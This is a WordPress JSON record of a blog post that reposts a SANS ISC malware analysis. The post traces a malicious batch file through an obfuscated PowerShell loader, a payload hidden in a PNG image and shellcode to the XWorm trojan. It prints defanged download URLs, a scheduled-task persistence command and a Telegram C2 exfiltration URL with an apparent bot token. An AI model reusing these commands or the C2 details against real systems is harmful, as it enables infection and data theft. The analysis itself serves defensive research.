{"id":1044,"date":"2026-02-04T10:04:18","date_gmt":"2026-02-04T10:04:18","guid":{"rendered":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/04\/malicious-script-delivering-more-maliciousness-wed-feb-4th\/"},"modified":"2026-02-04T10:04:18","modified_gmt":"2026-02-04T10:04:18","slug":"malicious-script-delivering-more-maliciousness-wed-feb-4th","status":"publish","type":"post","link":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/04\/malicious-script-delivering-more-maliciousness-wed-feb-4th\/","title":{"rendered":"Malicious Script Delivering More Maliciousness, (Wed, Feb 4th)"},"content":{"rendered":"<div>\n<p>Today, I received an interesting email with a malicious attachment. When I had a look at the automatic scan results, it seemed to be a malicious script to create a Chrome Injector to steal data. Because InfoStealers are very common these days, it looked \u201clegit\u201d but there was something different. The .bat file looks to be a fork of the one found in many GitHub repositories[<a href=\"https:\/\/github.com\/00nx\/Chrome-App-Bound-Encryption-Bypass\/blob\/main\/make.bat\">1<\/a>].<\/p>\n<p>When the regular script is completed, it jumps to :EndScript:<\/p>\n<pre style=\"background: rgb(238, 238, 238); border: 1px solid rgb(204, 204, 204); padding: 5px 10px;\">\ngoto :EndScript\n<\/pre>\n<p>A call to :show_msgbox was added at the script end:<\/p>\n<pre style=\"background: rgb(238, 238, 238); border: 1px solid rgb(204, 204, 204); padding: 5px 10px;\">\n:EndScript\nendlocal\ncall :show_msgbox\nexit \/b\n<\/pre>\n<p>Then, the magic begins. A payload is obfuscated with junk characters:<\/p>\n<p><img decoding=\"async\" alt=\"\" src=\"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260204-1.png\" style=\"width: 1001px; height: 344px;\"><\/p>\n<p>Very common techniques, the string is poluted with junk characters. It\u2019s a chunk of Base64-encode data that is executed through a PowerShell:<\/p>\n<p><img decoding=\"async\" alt=\"\" src=\"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260204-2.png\" style=\"width: 600px; height: 322px;\"><\/p>\n<p>It fetches a payload from hxxps:\/\/uniworldrivercruises-co[.]uk\/optimized_MSI.png. This is a real picture:<\/p>\n<p><img decoding=\"async\" alt=\"\" src=\"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260204-4.png\" style=\"width: 800px; height: 450px;\"><\/p>\n<p>But when some \u201cfun\u201d at the end. The next payload is delimited (and extracted) using the tags \u201cBaseStart-\u201d and \u201c-BaseEnd\u201d:<\/p>\n<p><img decoding=\"async\" alt=\"\" src=\"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260204-3.png\" style=\"width: 1000px; height: 226px;\"><\/p>\n<p>It\u2019s a shell code that is invoked with the following parameters:<\/p>\n<pre style=\"background: rgb(238, 238, 238); border: 1px solid rgb(204, 204, 204); padding: 5px 10px;\">\n'==gN1V3dl5UQy8SZslmZvkGch9SbvNmLulWYyRGblhXaw9yL6MHc0RHa','0','C:UsersPublicDownloads','VHkaJZD8Iq','appidtel','1','appidtel','1','hxxp:\/\/178[.]16[.]53[.]209\/buildingmoney.txt','C:UsersPublicDownloads','VHkaJZD8Iq','bat','1','0','4spTcCaYQA','0','','',''<\/pre>\n<p>The URL points to another payload. When I tried to decode it (it was Base64 encode and reversed), I could not automatically decode it because there was weird (non hex)\u00a0characters in the string. Thanks to ChatGPT, I decoded it with the following piece of Python script:<\/p>\n<pre style=\"background: rgb(238, 238, 238); border: 1px solid rgb(204, 204, 204); padding: 5px 10px;\">\nfrom pathlib import Path\nimport re\nimport binascii\n\ninput_file = Path(\"payload.txt\")\noutput_file = Path(\"payload.bin\")\n\nraw = input_file.read_bytes()\nascii_data = raw.decode(\"ascii\", errors=\"ignore\")\n\n# Keep only hex characters!!\nclean_hex = re.sub(r\"[^0-9a-fA-F]\", \"\", ascii_data)\nif len(clean_hex) % 2 != 0:\n    raise ValueError(\"Odd-length hex string after cleanup\")\n\nclean_hex = clean_hex[::-1]\nbinary = binascii.unhexlify(clean_hex)\noutput_file.write_bytes(binary)\n\nprint(f\"[+] Decoded {len(binary)} bytes to {output_file}\")<\/pre>\n<p>The decoded payload (SHA256:d99318c9b254b4fa5bf6f1dd15996dd50be0676dd84e822503fd273316eb9ba7) is a .Net program.\u00a0It implements persistence thtough a scheduled task:<\/p>\n<pre style=\"background: rgb(238, 238, 238); border: 1px solid rgb(204, 204, 204); padding: 5px 10px;\">\nC:WindowsSystem32schtasks.exe\" \/create \/f \/sc minute \/mo 1 \/tn \"Chromiumx2\" \/tr \"C:UsersadminAppDataRoamingChromiumx2.exe<\/pre>\n<p>And uses Telegram as C2:<\/p>\n<pre style=\"background: rgb(238, 238, 238); border: 1px solid rgb(204, 204, 204); padding: 5px 10px;\">\nhxxps:\/\/api[.]telegram[.]org\/bot7409572452:AAGp8Ak5bqZu2IkEdggJaz2mnMYRTkTjv-U\/sendMessage?chat_id=6870183115&amp;text=%E2%98%A0%20%5BXWorm%20V7.0%20@XCoderTools%5D%0D%0A%0D%0ANew%20CLient%20:%20%0D%0ACAECEB6F4379122BA468%0D%0A%0D%0AUserName%20:%20admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20AMD%20Ryzen%205%203500%206-Core%20Processor%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%205.99%20GB%0D%0AGroup%20:%20<span style=\"background-color:#f1c40f;\">XWorm%20V7.1<\/span><\/pre>\n<p>It&#8217;s another piece of\u00a0XWorm! Interesting way to drop the trojan in another malicious script&#8230;<\/p>\n<p>[1] <a href=\"https:\/\/github.com\/00nx\/Chrome-App-Bound-Encryption-Bypass\/blob\/main\/make.bat\">https:\/\/github.com\/00nx\/Chrome-App-Bound-Encryption-Bypass\/blob\/main\/make.bat<\/a><\/p>\n<p>Xavier Mertens (@xme)<br \/>\nXameco<br \/>\nSenior ISC Handler &#8211; Freelance Cyber Security Consultant<br \/>\n<a href=\"https:\/\/keybase.io\/xme\/key.asc\">PGP Key<\/a><\/p>\n<p> (c) SANS Internet Storm Center. https:\/\/isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.<\/p><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Today, I received an interesting email with a malicious attachment. When I had a look at the automatic scan results, it seemed to be a malicious script to create a Chrome Injector to steal data. Because InfoStealers are very common these days, it looked \u201clegit\u201d but there was something different. The .bat file looks to [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[90],"tags":[91],"class_list":["post-1044","post","type-post","status-publish","format-standard","hentry","category-cybersecurity","tag-cybersecurity"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.7 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Malicious Script Delivering More Maliciousness, (Wed, Feb 4th) - Imperative Business Ventures Limited<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/04\/malicious-script-delivering-more-maliciousness-wed-feb-4th\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Malicious Script Delivering More Maliciousness, (Wed, Feb 4th) - Imperative Business Ventures Limited\" \/>\n<meta property=\"og:description\" content=\"Today, I received an interesting email with a malicious attachment. When I had a look at the automatic scan results, it seemed to be a malicious script to create a Chrome Injector to steal data. Because InfoStealers are very common these days, it looked \u201clegit\u201d but there was something different. The .bat file looks to [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/04\/malicious-script-delivering-more-maliciousness-wed-feb-4th\/\" \/>\n<meta property=\"og:site_name\" content=\"Imperative Business Ventures Limited\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-04T10:04:18+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260204-1.png\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/04\/malicious-script-delivering-more-maliciousness-wed-feb-4th\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/04\/malicious-script-delivering-more-maliciousness-wed-feb-4th\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\"},\"headline\":\"Malicious Script Delivering More Maliciousness, (Wed, Feb 4th)\",\"datePublished\":\"2026-02-04T10:04:18+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/04\/malicious-script-delivering-more-maliciousness-wed-feb-4th\/\"},\"wordCount\":314,\"image\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/04\/malicious-script-delivering-more-maliciousness-wed-feb-4th\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260204-1.png\",\"keywords\":[\"Cybersecurity\"],\"articleSection\":[\"Cybersecurity\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/04\/malicious-script-delivering-more-maliciousness-wed-feb-4th\/\",\"url\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/04\/malicious-script-delivering-more-maliciousness-wed-feb-4th\/\",\"name\":\"Malicious Script Delivering More Maliciousness, (Wed, Feb 4th) - Imperative Business Ventures Limited\",\"isPartOf\":{\"@id\":\"https:\/\/blog.ibvl.in\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/04\/malicious-script-delivering-more-maliciousness-wed-feb-4th\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/04\/malicious-script-delivering-more-maliciousness-wed-feb-4th\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260204-1.png\",\"datePublished\":\"2026-02-04T10:04:18+00:00\",\"author\":{\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\"},\"breadcrumb\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/04\/malicious-script-delivering-more-maliciousness-wed-feb-4th\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/04\/malicious-script-delivering-more-maliciousness-wed-feb-4th\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/04\/malicious-script-delivering-more-maliciousness-wed-feb-4th\/#primaryimage\",\"url\":\"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260204-1.png\",\"contentUrl\":\"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260204-1.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/04\/malicious-script-delivering-more-maliciousness-wed-feb-4th\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/blog.ibvl.in\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Malicious Script Delivering More Maliciousness, (Wed, Feb 4th)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/blog.ibvl.in\/#website\",\"url\":\"https:\/\/blog.ibvl.in\/\",\"name\":\"Imperative Business Ventures Limited\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/blog.ibvl.in\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"sameAs\":[\"https:\/\/blog.ibvl.in\"],\"url\":\"https:\/\/blog.ibvl.in\/index.php\/author\/admin_hcbs9yw6\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Malicious Script Delivering More Maliciousness, (Wed, Feb 4th) - Imperative Business Ventures Limited","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/04\/malicious-script-delivering-more-maliciousness-wed-feb-4th\/","og_locale":"en_US","og_type":"article","og_title":"Malicious Script Delivering More Maliciousness, (Wed, Feb 4th) - Imperative Business Ventures Limited","og_description":"Today, I received an interesting email with a malicious attachment. When I had a look at the automatic scan results, it seemed to be a malicious script to create a Chrome Injector to steal data. Because InfoStealers are very common these days, it looked \u201clegit\u201d but there was something different. The .bat file looks to [&hellip;]","og_url":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/04\/malicious-script-delivering-more-maliciousness-wed-feb-4th\/","og_site_name":"Imperative Business Ventures Limited","article_published_time":"2026-02-04T10:04:18+00:00","og_image":[{"url":"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260204-1.png","type":"","width":"","height":""}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"admin","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/04\/malicious-script-delivering-more-maliciousness-wed-feb-4th\/#article","isPartOf":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/04\/malicious-script-delivering-more-maliciousness-wed-feb-4th\/"},"author":{"name":"admin","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02"},"headline":"Malicious Script Delivering More Maliciousness, (Wed, Feb 4th)","datePublished":"2026-02-04T10:04:18+00:00","mainEntityOfPage":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/04\/malicious-script-delivering-more-maliciousness-wed-feb-4th\/"},"wordCount":314,"image":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/04\/malicious-script-delivering-more-maliciousness-wed-feb-4th\/#primaryimage"},"thumbnailUrl":"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260204-1.png","keywords":["Cybersecurity"],"articleSection":["Cybersecurity"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/04\/malicious-script-delivering-more-maliciousness-wed-feb-4th\/","url":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/04\/malicious-script-delivering-more-maliciousness-wed-feb-4th\/","name":"Malicious Script Delivering More Maliciousness, (Wed, Feb 4th) - Imperative Business Ventures Limited","isPartOf":{"@id":"https:\/\/blog.ibvl.in\/#website"},"primaryImageOfPage":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/04\/malicious-script-delivering-more-maliciousness-wed-feb-4th\/#primaryimage"},"image":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/04\/malicious-script-delivering-more-maliciousness-wed-feb-4th\/#primaryimage"},"thumbnailUrl":"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260204-1.png","datePublished":"2026-02-04T10:04:18+00:00","author":{"@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02"},"breadcrumb":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/04\/malicious-script-delivering-more-maliciousness-wed-feb-4th\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/blog.ibvl.in\/index.php\/2026\/02\/04\/malicious-script-delivering-more-maliciousness-wed-feb-4th\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/04\/malicious-script-delivering-more-maliciousness-wed-feb-4th\/#primaryimage","url":"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260204-1.png","contentUrl":"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260204-1.png"},{"@type":"BreadcrumbList","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/04\/malicious-script-delivering-more-maliciousness-wed-feb-4th\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/blog.ibvl.in\/"},{"@type":"ListItem","position":2,"name":"Malicious Script Delivering More Maliciousness, (Wed, Feb 4th)"}]},{"@type":"WebSite","@id":"https:\/\/blog.ibvl.in\/#website","url":"https:\/\/blog.ibvl.in\/","name":"Imperative Business Ventures Limited","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/blog.ibvl.in\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g","caption":"admin"},"sameAs":["https:\/\/blog.ibvl.in"],"url":"https:\/\/blog.ibvl.in\/index.php\/author\/admin_hcbs9yw6\/"}]}},"_links":{"self":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts\/1044","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/comments?post=1044"}],"version-history":[{"count":0,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts\/1044\/revisions"}],"wp:attachment":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/media?parent=1044"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/categories?post=1044"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/tags?post=1044"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}